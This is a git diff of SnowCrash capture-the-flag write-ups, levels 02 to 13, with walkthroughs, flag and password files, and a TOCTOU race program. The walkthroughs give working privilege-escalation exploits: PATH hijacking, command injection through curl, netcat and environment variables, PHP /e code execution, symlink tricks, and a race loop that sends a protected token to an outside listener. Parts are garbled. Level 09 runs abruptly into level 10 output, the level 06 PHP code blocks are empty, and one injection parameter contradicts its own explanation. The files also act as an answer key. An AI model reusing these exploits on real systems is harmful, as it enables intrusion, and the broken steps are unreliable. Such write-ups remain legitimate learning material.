b/snowcrash/level02/passwd new file mode 100644 index 0000000..08efa4d --- /dev/null +++ b/snowcrash/level02/passwd @@ -0,0 +1 @@ +f2av5il02puano7naaf6adaaf diff --git a/snowcrash/level03/README.md b/snowcrash/level03/README.md new file mode 100644 index 0000000..0e2b621 --- /dev/null +++ b/snowcrash/level03/README.md @@ -0,0 +1,110 @@ +# Level 03 + +## how to login + +username: level03 + +password: kooda2puivaav1idi4f57q8iq + +## Goal + +run `getflag` as user `flag03` + +## Actually doing something + +As usual: + +```bash +level03@SnowCrash:~$ ll +total 24 +dr-x------ 1 level03 level03 120 Mar 5 2016 ./ +d--x--x--x 1 root users 340 Aug 30 2015 ../ +-r-x------ 1 level03 level03 220 Apr 3 2012 .bash_logout* +-r-x------ 1 level03 level03 3518 Aug 30 2015 .bashrc* +-rwsr-sr-x 1 flag03 level03 8627 Mar 5 2016 level03* +-r-x------ 1 level03 level03 675 Apr 3 2012 .profile* +``` + +We have a funny binary ! +having the `s` permission in the executable spot means it is setuid + +what is setuid ? it means that when executed, it runs as the user that own the binary + +What a coincidence ! The user that own the binary is `flag03` + +lets look at what happens when we run the binary without anything special: + +```bash +level03@SnowCrash:~$ ./level03 +Exploit me +``` + +Oh yes I will ! + +```bash +level03@SnowCrash:~$ file level03 +level03: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x3bee584f790153856e826e38544b9e80ac184b7b, not stripped +``` + +We already knew all the useful information here, but at least we have a proof that it is an "normal" executable (ELF is what linux uses for binaries), it is indeed setuid (and setgid). No stripped means that we have a minimum of debug info (like symbol names) + +What to do ? Lets bring out the big gun and start fully RE the binary. +How ? Using Ghidra. Ghidra is an NSA program made to take a binary, and look at it very closely. It can try to produce C-looking code that matches the assembly, and allow you to rename variables, function and all + +```c +int main(int argc,char **argv,char **envp) +{ + __gid_t __rgid; + __uid_t __ruid; + int iVar1; + gid_t gid; + uid_t uid; + + __rgid = getegid(); + __ruid = geteuid(); + setresgid(__rgid,__rgid,__rgid); + setresuid(__ruid,__ruid,__ruid); + iVar1 = system("/usr/bin/env echo Exploit me"); + return iVar1; +} +``` + +Ghidra dissembled the main function, and it looks like this. +Here it is valid C code, but sometimes ghidra can't produce valid C code because the assembly is missing data, so we were lucky ! + +Looking at this, it seems that the program does a little UID dance (and GID too), but we kinda don't care. +It doesn't seems to be exploitable in itself (but we do have to note that this +actually makes the binary a privilege escalation vector!) + +What is important is the `system("/usr/bin/env echo Exploit me")` line. This launch a new process. +Looking at the `system` function, it behave likes an shell command (as in it calls a shell behind the scene), so we can have fun + +the `/usr/bin/env` is very powerfull, but what we will use is the fact that it tries to find +the command passed as an argument in the `PATH` + +but WE own the PATH variable. Nothing prevents us from slipping a new directory in the `PATH`, and having an `echo` command in it + +lets do that +```bash +level03@SnowCrash:~$ mkdir /tmp/path +level03@SnowCrash:~$ cat </tmp/path/echo +> #!/bin/sh +> echo "I'm in !" +> EOF +level03@SnowCrash:~$ chmod +x /tmp/path/echo +level03@SnowCrash:~$ PATH=/tmp/path:$PATH ./level03 +I'm in ! +``` +We are indeed in + +now we can do lots of stuff, and we can basically call getflag. + +I want to be a bit sneaky, so lets make it call getflag directly + +```bash +level03@SnowCrash:~$ mkdir /tmp/path +level03@SnowCrash:~$ ln -s $(which getflag) /tmp/path/echo +level03@SnowCrash:~$ PATH=/tmp/path:$PATH ./level03 +Check flag.Here is your token : qi0maab88jeaj46qoumi7maus +``` +We just made a symlink in our naughty directory to the getflag binary, so when the "echo" got launched, it was actually `getflag` ! diff --git a/snowcrash/level03/flag b/snowcrash/level03/flag new file mode 100644 index 0000000..f5e998e --- /dev/null +++ b/snowcrash/level03/flag @@ -0,0 +1 @@ +qi0maab88jeaj46qoumi7maus diff --git a/snowcrash/level03/passwd b/snowcrash/level03/passwd new file mode 100644 index 0000000..09d3ca9 --- /dev/null +++ b/snowcrash/level03/passwd @@ -0,0 +1 @@ +kooda2puivaav1idi4f57q8iq diff --git a/snowcrash/level04/README.md b/snowcrash/level04/README.md new file mode 100644 index 0000000..22e4750 --- /dev/null +++ b/snowcrash/level04/README.md @@ -0,0 +1,96 @@ +# Level 04 + +## how to login + +username: level04 + +password: qi0maab88jeaj46qoumi7maus + +## Goal + +run `getflag` as user `flag04` + +## Actually doing something + +```bash +level04@SnowCrash:~$ ll +total 16 +dr-xr-x---+ 1 level04 level04 120 Mar 5 2016 ./ +d--x--x--x 1 root users 340 Aug 30 2015 ../ +-r-x------ 1 level04 level04 220 Apr 3 2012 .bash_logout* +-r-x------ 1 level04 level04 3518 Aug 30 2015 .bashrc* +-rwsr-sr-x 1 flag04 level04 152 Mar 5 2016 level04.pl* +-r-x------ 1 level04 level04 675 Apr 3 2012 .profile* +``` + +Hmmm `.pl`. Lets dig out the dinosaur and have fun with some Perl + +```perl +#!/usr/bin/perl +# localhost:4747 +use CGI qw{param}; +print "Content-type: text/html\n\n"; +sub x { + $y = $_[0]; + print `echo $y 2>&1`; +} +x(param("x")); +``` + +This reeks of exploit + +As I understand it this is used by the http server at localhost:4747, and on a request it takes the parameter `x` and returns it + +The issue is how it returns it... + +It forward it to a shell string, and print the result. +This is as secure as having a litteral endpoint that takes a command and return the result. + +Why ? because the data is passed as is, without any form of sanitization, meaning that if we have any way of "leaving" the `echo` +command we can run whatever we want + +for example `getflag` + +we want this +```perl + print `echo $y 2>&1` +``` +to become +```perl + print `echo idk && getflag 2>&1` +``` + +We are in shell, so we can remove the spaces around the `&&` meaning that `x` must be equal to `idk&&getflag` + +but if we do it dumbly, nothing happens + +```bash +level04@SnowCrash:~$ curl 'localhost:4747?x=idk&&getflag' +idk +``` + +Why ? + +Because `&` has a special meaning in urls, it separetes query arguments. we need to escape it. + +How ? + +The standard says to use percent-encoding. Reading a bit more it says that `%26` is the escape code for `&` + +lets replace it to get `idk%26%26getflag` and voila ! + +```bash +level04@SnowCrash:~$ curl 'localhost:4747?x=GetExploited%26%26getflag' +GetExploited +Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap +``` + +lets have a bit more fun. since we have access to the machine itself, we can create a file somewhere, and run it by giving it a path + +```bash +level04@SnowCrash:~$ curl 'localhost:4747?x=idk%26%26/tmp/path/echo' +idk +Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap +``` + +Look mom, I recycle my stuff ! diff --git a/snowcrash/level04/flag b/snowcrash/level04/flag new file mode 100644 index 0000000..920bae8 --- /dev/null +++ b/snowcrash/level04/flag @@ -0,0 +1 @@ +ne2searoevaevoem4ov4ar8ap diff --git a/snowcrash/level04/passwd b/snowcrash/level04/passwd new file mode 100644 index 0000000..f5e998e --- /dev/null +++ b/snowcrash/level04/passwd @@ -0,0 +1 @@ +qi0maab88jeaj46qoumi7maus diff --git a/snowcrash/level05/README.md b/snowcrash/level05/README.md new file mode 100644 index 0000000..8630d44 --- /dev/null +++ b/snowcrash/level05/README.md @@ -0,0 +1,76 @@ +# Level 05 + +## how to login + +username: level05 + +password: ne2searoevaevoem4ov4ar8ap + +## Goal + +run `getflag` as user `flag05` + +## Actually doing something + +```bash +level05@snowcrash.local.maix.me's password: +You have new mail. +level05@SnowCrash:~$ +``` + +This is weird, the only mail I have is my chain mail ! + +Jokes aside, looking at the files in the user's home, there is nothing other than the default ones. + +This reeks of old program though. Nobody check mails directly when they login like this. + +From my times on wikipedia *not working* I know that `/var/mail` sometimes exists, lets check it + +```bash +level05@SnowCrash:~$ ll /var/mail/level05 +-rw-r--r--+ 1 root mail 58 Jan 19 13:44 /var/mail/level05 +level05@SnowCrash:~$ cat /var/mail/level05 +*/2 * * * * su -c "sh /usr/sbin/openarenaserver" - flag05 +``` + +Oh wow, this looks like a nice cronjob + +if we decipher the old text, we get something like this: + +> Every two minutes (0, 2, 4, etc...) run the command `su -c "sh /usr/sbin/openarenaserver" - flag05` + +so `su -c "text"` means "please run `text` as X" and the `- flag05` means "use as `flag05` and not `root` as your user" + +so this runs `/usr/sbin/openarenaserver` every two minutes as the user `flag05` + +lets read that script + +```bash +level05@SnowCrash:~$ cat /usr/sbin/openarenaserver +#!/bin/sh + +for i in /opt/openarenaserver/* ; do + (ulimit -t 5; bash -x "$i") + rm -f "$i" +done +``` + +It looks like it runs the files present in `/opt/openarenaserver` with a limit of 5s (cpu time) per process, and then remove that file + +lets try to add a little script there (like say something that dumps the output of `getflag` to elsewhere?) + +```bash +``level05@SnowCrash:~$ cat </tmp/getflag05 +> #!/bin/sh +> getflag >/tmp/flag05 +> chmod +r /tmp/flag05 +> EOF +level05@SnowCrash:~$ chmod a+rx /tmp/getflag05 +level05@SnowCrash:~$ ln -s /tmp/getflag05 /opt/openarenaserver/flag +level05@SnowCrash:~$ sleep 120 && cat /tmp/flag05 +Check flag.Here is your token : viuaaale9huek52boumoomioc +``` + +And voila ! +We had to write the result to another file since otherwise the data would be lost to the ether (crontab stdio) + diff --git a/snowcrash/level05/flag b/snowcrash/level05/flag new file mode 100644 index 0000000..2a41b4d --- /dev/null +++ b/snowcrash/level05/flag @@ -0,0 +1 @@ +viuaaale9huek52boumoomioc diff --git a/snowcrash/level05/passwd b/snowcrash/level05/passwd new file mode 100644 index 0000000..920bae8 --- /dev/null +++ b/snowcrash/level05/passwd @@ -0,0 +1 @@ +ne2searoevaevoem4ov4ar8ap diff --git a/snowcrash/level06/README.md b/snowcrash/level06/README.md new file mode 100644 index 0000000..8d24270 --- /dev/null +++ b/snowcrash/level06/README.md @@ -0,0 +1,131 @@ +# Level 06 + +## how to login + +username: level06 + +password: viuaaale9huek52boumoomioc + + +## Goal + +run `getflag` as user `flag06` + +## Actually doing something + +```bash +level06@SnowCrash:~$ ls -la +total 24 +dr-xr-x---+ 1 level06 level06 140 Mar 5 2016 . +d--x--x--x 1 root users 340 Aug 30 2015 .. +-r-x------ 1 level06 level06 220 Apr 3 2012 .bash_logout +-r-x------ 1 level06 level06 3518 Aug 30 2015 .bashrc +-rwsr-x---+ 1 flag06 level06 7503 Aug 30 2015 level06 +-rwxr-x--- 1 flag06 level06 356 Mar 5 2016 level06.php +-r-x------ 1 level06 level06 675 Apr 3 2012 .profile +``` + +A php file, and a setuid binary ? Seems fishy + +lets look at the php file first + +```php +#!/usr/bin/php + +``` + +This doesnt look good... + +lets try to run the setuid binary + +```bash +level06@SnowCrash:~$ ./level06 +PHP Warning: file_get_contents(): Filename cannot be empty in /home/user/level06/level06.php on line 4 +level06@SnowCrash:~$ ./level06 /tmp/flag05 +#!/bin/sh +getflag >/tmp/flag05-output 2>&1 +chmod +w /tmp/flag05-output +``` + +Can we ... just read whatever file we want ?! There must be something + +lets look a the php file a bit more + +Here is it with a better formatting +```php +#!/usr/bin/php + +``` + +and here it is with better names +```php +#!/usr/bin/php + +``` + +it looks like it replaces lots of stuff, but overhall doesnt do much things + +until I researched what the `/e` meant in the line right after `file_get_contents` + +so it turns out this is a deprecated (and then removed) feature of PHP that allows the regexes search and replace to run code for every match + +meaning that this will match any `[x ]` and run the function `y("")` + +lets try some stuff then ! + +```bash +level06@SnowCrash:~$ echo "[x @.@@.] @@" >/tmp/06 +level06@SnowCrash:~$ ./level06 /tmp/06 + y x y y x @@ +``` + +It indeed ran the function `y` on the stuff inside brackets but not the stuff outside + +so after a bit of digging into php, this seems to work and give us the flag ! +```bash +level06@SnowCrash:~$ echo '[x ${`getflag`}]' >/tmp/06 && ./level06 /tmp/06 +PHP Notice: Undefined variable: Check flag.Here is your token : wiok45aaoguiboiki2tuin6ub + in /home/user/level06/level06.php(4) : regexp code on line 1 +``` + +From what I understood: `${stuff}` is a way to reference a variable name using another expression (here the variable name will be whatever stuff evaluates to) +and ``stuff\`` runs the shell command `stuff` + +meaning that we want to get a variable named after the result of getflag -> it doesnt exist -> php compains and print a warning :D + diff --git a/snowcrash/level06/flag b/snowcrash/level06/flag new file mode 100644 index 0000000..b060f48 --- /dev/null +++ b/snowcrash/level06/flag @@ -0,0 +1 @@ +wiok45aaoguiboiki2tuin6ub diff --git a/snowcrash/level06/passwd b/snowcrash/level06/passwd new file mode 100644 index 0000000..2a41b4d --- /dev/null +++ b/snowcrash/level06/passwd @@ -0,0 +1 @@ +viuaaale9huek52boumoomioc diff --git a/snowcrash/level07/README.md b/snowcrash/level07/README.md new file mode 100644 index 0000000..785d601 --- /dev/null +++ b/snowcrash/level07/README.md @@ -0,0 +1,99 @@ +# Level 07 + +## how to login + +username: level07 + +password: wiok45aaoguiboiki2tuin6ub + +## Goal + +run `getflag` as user `flag07` + +## Actually doing something + +```bash +level07@SnowCrash:~$ ll +total 24 +dr-x------ 1 level07 level07 120 Mar 5 2016 ./ +d--x--x--x 1 root users 340 Aug 30 2015 ../ +-r-x------ 1 level07 level07 220 Apr 3 2012 .bash_logout* +-r-x------ 1 level07 level07 3518 Aug 30 2015 .bashrc* +-rwsr-sr-x 1 flag07 level07 8805 Mar 5 2016 level07* +-r-x------ 1 level07 level07 675 Apr 3 2012 .profile* +``` + +seems like reverse engineering to me + +```bash +level07@SnowCrash:~$ ./level07 +level07 +``` + +seems to be fun at parties indeed + +lets crack open ghidra + + +```c +int main(int argc,char **argv,char **envp) + +{ + char *pcVar1; + int iVar2; + char *buffer; + gid_t gid; + uid_t uid; + char *local_1c; + __gid_t local_18; + __uid_t local_14; + + local_18 = getegid(); + local_14 = geteuid(); + setresgid(local_18,local_18,local_18); + setresuid(local_14,local_14,local_14); + local_1c = (char *)0x0; + pcVar1 = getenv("LOGNAME"); + asprintf(&local_1c,"/bin/echo %s ",pcVar1); + iVar2 = system(local_1c); + return iVar2; +} +``` +we have the classic setuid dance at the begining of the function, then a call to `getenv`+`asprintf`+`system` + +I see a `system` so I know we are on track ! + +but lets go in order and clean up the code a bit + +```c +int main(int argc,char **argv,char **envp) +{ + char *env; + int ret; + char *str; + + str = NULL; + env = getenv("LOGNAME"); + asprintf(&str,"/bin/echo %s ",env); + ret = system(str); + return ret; +} +``` + +already way better + +It looks like it does something like this: + +- Get the Varaible `LOGNAME` +- Create a string that looks like `/bin/echo $LOGNAME` using asprintf + asprintf is a way to create an allocated string with the format a regular printf would output +- call system to execute the created string + +To me this reeks of simple `&& getflag`, lets try it out ! + +```bash +level07@SnowCrash:~$ LOGNAME="&& getflag" ./level07 + +Check flag.Here is your token : fiumuikeil55xe9cu4dood66h +``` + diff --git a/snowcrash/level07/flag b/snowcrash/level07/flag new file mode 100644 index 0000000..2e22df3 --- /dev/null +++ b/snowcrash/level07/flag @@ -0,0 +1 @@ +fiumuikeil55xe9cu4dood66h diff --git a/snowcrash/level07/passwd b/snowcrash/level07/passwd new file mode 100644 index 0000000..b060f48 --- /dev/null +++ b/snowcrash/level07/passwd @@ -0,0 +1 @@ +wiok45aaoguiboiki2tuin6ub diff --git a/snowcrash/level08/README.md b/snowcrash/level08/README.md new file mode 100644 index 0000000..b2d458a --- /dev/null +++ b/snowcrash/level08/README.md @@ -0,0 +1,51 @@ +# Level 08 + +## how to login + +username: level08 + +password: fiumuikeil55xe9cu4dood66h + +## Goal + +run `getflag` as user `flag08` + +## Actually doing something + +```bash +level08@SnowCrash:~$ ll +total 28 +dr-xr-x---+ 1 level08 level08 140 Mar 5 2016 ./ +d--x--x--x 1 root users 340 Aug 30 2015 ../ +-r-x------ 1 level08 level08 220 Apr 3 2012 .bash_logout* +-r-x------ 1 level08 level08 3518 Aug 30 2015 .bashrc* +-rwsr-s---+ 1 flag08 level08 8617 Mar 5 2016 level08* +-r-x------ 1 level08 level08 675 Apr 3 2012 .profile* +-rw------- 1 flag08 flag08 26 Mar 5 2016 token +``` + +intresting, we have the usual setuid binary, but we also have a file we can't read named token. I wonder if the flag is there + +lets run the binary and see what happens + +```bash +level08@SnowCrash:~$ ./level08 +./level08 [file to read] +level08@SnowCrash:~$ ./level08 token +You may not access 'token' +``` +It is a little bit smart, lets try to outsmart it by using symlinks + +```bash +level08@SnowCrash:~$ ln -s $(realpath token) /tmp/level08 +level08@SnowCrash:~$ ./level08 /tmp/level08 +quif5eloekouj29ke0vouxean +``` +the old tale of checking for filename, and not actual file ! + +we can now get the actual token with that password: +```bash +level08@SnowCrash:~$ su flag08 -c getflag +Password: +Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f +``` diff --git a/snowcrash/level08/flag b/snowcrash/level08/flag new file mode 100644 index 0000000..4626f57 --- /dev/null +++ b/snowcrash/level08/flag @@ -0,0 +1 @@ +25749xKZ8L7DkSCwJkT9dyv6f diff --git a/snowcrash/level08/passwd b/snowcrash/level08/passwd new file mode 100644 index 0000000..2e22df3 --- /dev/null +++ b/snowcrash/level08/passwd @@ -0,0 +1 @@ +fiumuikeil55xe9cu4dood66h diff --git a/snowcrash/level09/README.md b/snowcrash/level09/README.md new file mode 100644 index 0000000..e299f3f --- /dev/null +++ b/snowcrash/level09/README.md @@ -0,0 +1,105 @@ +# Level 09 + +## how to login + +username: level09 + +password: 25749xKZ8L7DkSCwJkT9dyv6f + +## Goal + +run `getflag` as user `flag09` + +## Actually doing something + +```bash +level09@SnowCrash:~$ ll +total 24 +dr-x------ 1 level09 level09 140 Mar 5 2016 ./ +d--x--x--x 1 root users 340 Aug 30 2015 ../ +-r-x------ 1 level09 level09 220 Apr 3 2012 .bash_logout* +-r-x------ 1 level09 level09 3518 Aug 30 2015 .bashrc* +-rwsr-sr-x 1 flag09 level09 7640 Mar 5 2016 level09* +-r-x------ 1 level09 level09 675 Apr 3 2012 .profile* +----r--r-- 1 flag09 level09 26 Mar 5 2016 token +``` + +seems we need to do the same as last level +lets have fun hehe + +```bash +level09@SnowCrash:~$ ./level09 +You need to provied only one arg. +level09@SnowCrash:~$ ./level09 AAA +ABC +level09@SnowCrash:~$ ./level09 AAAAAAAAA +ABCDEFGHI +``` + +What happens if I give it a REALLY LONG argument ? + +```bash +level09@SnowCrash:~$ ./level09 $(python -c "print('A' * 1000)") +ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�������������������������������������������������������������� + + +123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�������������������������������������������������������������� + + +123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�������������������������������������������������������������� + + +123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�������������������������������������������������������������� +``` + +Alright lets open this bad boy under Ghidra + +Woops after reading the code, it seems that it specifically tells you to not reverse it. + +Looking a the files a bit closer, we can actually read the token file... + +```bash +level09@SnowCrash:~$ ll token +----r--r-- 1 flag09 level09 26 Mar 5 2016 token +level09@SnowCrash:~$ cat token +f4kmm6p|=pnDBDu{ +``` + +trying to directly use this as the password doesnt work, but when looking at the output of the binary, it seems that the does weird stuff to the input, lets try to run it through. + + +```bash +level09@SnowCrash:~$ ./level09 `cat token` +f5mpq;vE{{TSW +level09@SnowCrash:~$ su -c getflag flag09 +Password: +su: Authentication failure +``` + +Doesnt work. + +Then lets try to reverse the effect of the binary ? + +It looks like it does something like this: +> for every character in input +> output (character+idx) % 255 + +let do a script that does: +> for every character in input +> output (character-idx) % 255 + +we run it and we get +```bash +❯ ./levels/09/script.py /tmp/file +level10@SnowCrash:~$ ./level10 /tmp/file 192.168.92.90 +Connecting to 192.168.92.90:6969 .. Connected! +Sending file .. wrote file! +``` + +```bash +# host +❯ socat TCP-LISTEN:6969,fork stdio +.*( )*. +file +``` + +we got the file ! + +now the issue is that we can't send the token file direcly because it seems there isnt the +litlle setuid dance we have come to expect... + +lets try to use a symlink ? + +```bash +level10@SnowCrash:~$ ln -s $(realpath token) /tmp/tok2 +level10@SnowCrash:~$ ./level10 /tmp/tok2 192.168.92.90 +You don't have access to /tmp/tok2 +``` + +When looking at the code, we have a check for permission (`access`) THEN we open the file using `open` + +What if we try really hard to make it so when the program check for the file permission using access, it is a file we have full permission, but when it opens the file, it is changed to be the token file (a symlink to it) + +lets write a little code for that: +```c +#include +#include +#include + +int main(int argc, char **argv) { + if (argc < 2) { + fprintf(stderr, "%s: \n", argv[0]); + return 1; + } + const char *file = argv[1]; + const char *target = argv[2]; + int fd = -1; + while (1) { + unlink(file); + fd = open(file, O_CREAT | O_RDWR | O_TRUNC, 0777); + close(fd); + unlink(file); + symlink(target, file); + } +} +``` + +copy this to the VM (in /tmp), compile it, and run it + +```bash +# shell 1 +level10@SnowCrash:~$ /tmp/toctou /tmp/tok2 $(realpath token) +``` +in shell 2 run something like this: +```bash +level10@SnowCrash:~$ while true; do ./level10 /tmp/tok2 192.168.92.90; done +``` + +since the issue (Named TOCTOU for `Time of Check - Time of Use`) is by nature time sensitive, we run it as long as we need to, hoping for at least ONE single nice happy path :D + + +and on the host, we get this: +```bash +❯ socat TCP-LISTEN:6969,fork stdio +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +woupa2yuojeeaaed06riuj63c +.*( )*. +.*( )*. +.*( )*. +.*( )*. +woupa2yuojeeaaed06riuj63c +.*( )*. +.*( )*. +.*( )*. +.*( )*. +woupa2yuojeeaaed06riuj63c +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +woupa2yuojeeaaed06riuj63c +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +.*( )*. +``` + +we get lots of empty files (the one we try to trick the permission check with), and few token :D + +```bash +level10@SnowCrash:~$ su flag10 -c getflag +Password: +Check flag.Here is your token : feulo4b72j7edeahuete3no7c +``` diff --git a/snowcrash/level10/flag b/snowcrash/level10/flag new file mode 100644 index 0000000..c82e302 --- /dev/null +++ b/snowcrash/level10/flag @@ -0,0 +1 @@ +feulo4b72j7edeahuete3no7c diff --git a/snowcrash/level10/passwd b/snowcrash/level10/passwd new file mode 100644 index 0000000..1dbbfc3 --- /dev/null +++ b/snowcrash/level10/passwd @@ -0,0 +1 @@ +s5cAJpM8ev6XHw998pRWG728z diff --git a/snowcrash/level10/ressources/toctou.c b/snowcrash/level10/ressources/toctou.c new file mode 100644 index 0000000..4d6fa23 --- /dev/null +++ b/snowcrash/level10/ressources/toctou.c @@ -0,0 +1,20 @@ +#include +#include +#include + +int main(int argc, char **argv) { + if (argc < 2) { + fprintf(stderr, "%s: \n", argv[0]); + return 1; + } + const char *file = argv[1]; + const char *target = argv[2]; + int fd = -1; + while (1) { + unlink(file); + fd = open(file, O_CREAT | O_RDWR | O_TRUNC, 0777); + close(fd); + unlink(file); + symlink(target, file); + } +} diff --git a/snowcrash/level11/README.md b/snowcrash/level11/README.md new file mode 100644 index 0000000..29114df --- /dev/null +++ b/snowcrash/level11/README.md @@ -0,0 +1,86 @@ +# Level 11 + +## how to login + +username: level11 + +password: feulo4b72j7edeahuete3no7c + +## Goal + +run `getflag` as user `flag11` + +## Actually doing something + + +```bash +level11@SnowCrash:~$ ll +total 16 +dr-xr-x---+ 1 level11 level11 120 Mar 5 2016 ./ +d--x--x--x 1 root users 340 Aug 30 2015 ../ +-r-x------ 1 level11 level11 220 Apr 3 2012 .bash_logout* +-r-x------ 1 level11 level11 3518 Aug 30 2015 .bashrc* +-rwsr-sr-x 1 flag11 level11 668 Mar 5 2016 level11.lua* +-r-x------ 1 level11 level11 675 Apr 3 2012 .profile* +``` + +a setuid script ? something seems fishy, lets open it + +```lua +#!/usr/bin/env lua +local socket = require("socket") +local server = assert(socket.bind("127.0.0.1", 5151)) + +function hash(pass) + prog = io.popen("echo "..pass.." | sha1sum", "r") + data = prog:read("*all") + prog:close() + + data = string.sub(data, 1, 40) + + return data +end + + +while 1 do + local client = server:accept() + client:send("Password: ") + client:settimeout(60) + local l, err = client:receive() + if not err then + print("trying " .. l) + local h = hash(l) + + if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then + client:send("Erf nope..\n"); + else + client:send("Gz you dumb*\n") + end + + end + + client:close() +end +``` + +it seems to be a server that ask for a password, check that the password is correct and does something ? + +Lookit at the `hash` function, we do see a nice little shell injection oportunity, lets try something :D + +we want to have something that write the getflag somewhere like we did before. + +what about the same script: +```bash +level11@SnowCrash:~$ cat </tmp/gettok +#!/bin/sh +getflag >/tmp/flag +chmod 777 /tmp/flag +EOF +level11@SnowCrash:~$ chmod +x /tmp/gettok +level11@SnowCrash:~$ echo "; /tmp/gettok" | nc localhost 5151 +Password: Erf nope.. +level11@SnowCrash:~$ cat /tmp/flag +Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s +``` + +and voila :D diff --git a/snowcrash/level11/flag b/snowcrash/level11/flag new file mode 100644 index 0000000..54ea557 --- /dev/null +++ b/snowcrash/level11/flag @@ -0,0 +1 @@ +fa6v5ateaw21peobuub8ipe6s diff --git a/snowcrash/level11/passwd b/snowcrash/level11/passwd new file mode 100644 index 0000000..c82e302 --- /dev/null +++ b/snowcrash/level11/passwd @@ -0,0 +1 @@ +feulo4b72j7edeahuete3no7c diff --git a/snowcrash/level12/README.md b/snowcrash/level12/README.md new file mode 100644 index 0000000..2ea1d15 --- /dev/null +++ b/snowcrash/level12/README.md @@ -0,0 +1,117 @@ +# Level 12 + +## how to login + +username: level12 + +password: fa6v5ateaw21peobuub8ipe6s + +## Goal + +run `getflag` as user `flag12` + +## Actually doing something + +```bash +level12@SnowCrash:~$ ll +total 16 +dr-xr-x---+ 1 level12 level12 120 Mar 5 2016 ./ +d--x--x--x 1 root users 340 Aug 30 2015 ../ +-r-x------ 1 level12 level12 220 Apr 3 2012 .bash_logout* +-r-x------ 1 level12 level12 3518 Aug 30 2015 .bashrc* +-rwsr-sr-x+ 1 flag12 level12 464 Mar 5 2016 level12.pl* +-r-x------ 1 level12 level12 675 Apr 3 2012 .profile* +``` + +Perl again... + +```perl +level12@SnowCrash:~$ cat level12.pl +#!/usr/bin/env perl +# localhost:4646 +use CGI qw{param}; +print "Content-type: text/html\n\n"; + +sub t { + $nn = $_[1]; + $xx = $_[0]; + $xx =~ tr/a-z/A-Z/; + $xx =~ s/\s.*//; + @output = `egrep "^$xx" /tmp/xd 2>&1`; + foreach $line (@output) { + ($f, $s) = split(/:/, $line); + if($s =~ $nn) { + return 1; + } + } + return 0; +} + +sub n { + if($_[0] == 1) { + print(".."); + } else { + print("."); + } +} + +n(t(param("x"), param("y"))); +``` +a bit more involed, lets try to make it more pretty + +```perl +#!/usr/bin/env perl +# localhost:4646 +use CGI qw{param}; +print "Content-type: text/html\n\n"; + +sub t { + $arg2 = $_[1]; + $arg1 = $_[0]; + $arg1 =~ tr/a-z/A-Z/; + $arg1 =~ s/\s.*//; + @output = `egrep "^$arg1" /tmp/xd 2>&1`; + foreach $line (@output) { + ($f, $s) = split(/:/, $line); + if($s =~ $arg2) { + return 1; + } + } + return 0; +} + +sub n { + if($_[0] == 1) { + print(".."); + } else { + print("."); + } +} + +n(t(param("x"), param("y"))); +``` + +when looking at this, we basically spot an `egrep` meaning that we have a shell injection. + +lets look at what is given to this string + +first of all, we get called with two argument, lets call them by their http parameter names `x` and `y` + +in the script they are also named `arg1` for `x` and `arg2` for `y` + +arg2 doesn't matter for us, so lets ignore it + +arg1 is converted to uppercase, and then we only keep erverything up to the first space; + +so we want to execute something like last time, meaning that we want to instert something to stop the current comment +`";cmdhere` + +but the issue is that we need to have a command in uppercase (because everuthing gets convert to uppercase), however the only directory we can write to is `/tmp` which is in lowercase... + +Alas this doesnt matter since we are in shell land, and we can say `/*/GETOK` to refer to the `/tmp/GETOK` script + +```bash +level12@SnowCrash:~$ curl "localhost:4646?y=%22%3B/*/GETTOK%3B%22" && cat /tmp/flag +..Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr +``` + diff --git a/snowcrash/level12/flag b/snowcrash/level12/flag new file mode 100644 index 0000000..29e9492 --- /dev/null +++ b/snowcrash/level12/flag @@ -0,0 +1 @@ +g1qKMiRpXf53AWhDaU7FEkczr diff --git a/snowcrash/level12/passwd b/snowcrash/level12/passwd new file mode 100644 index 0000000..54ea557 --- /dev/null +++ b/snowcrash/level12/passwd @@ -0,0 +1 @@ +fa6v5ateaw21peobuub8ipe6s diff --git a/snowcrash/level13/README.md b/snowcrash/level13/README.md new file mode 100644 index 0000000..3bcc43f --- /dev/null +++ b/snowcrash/level13/README.md @@ -0,0 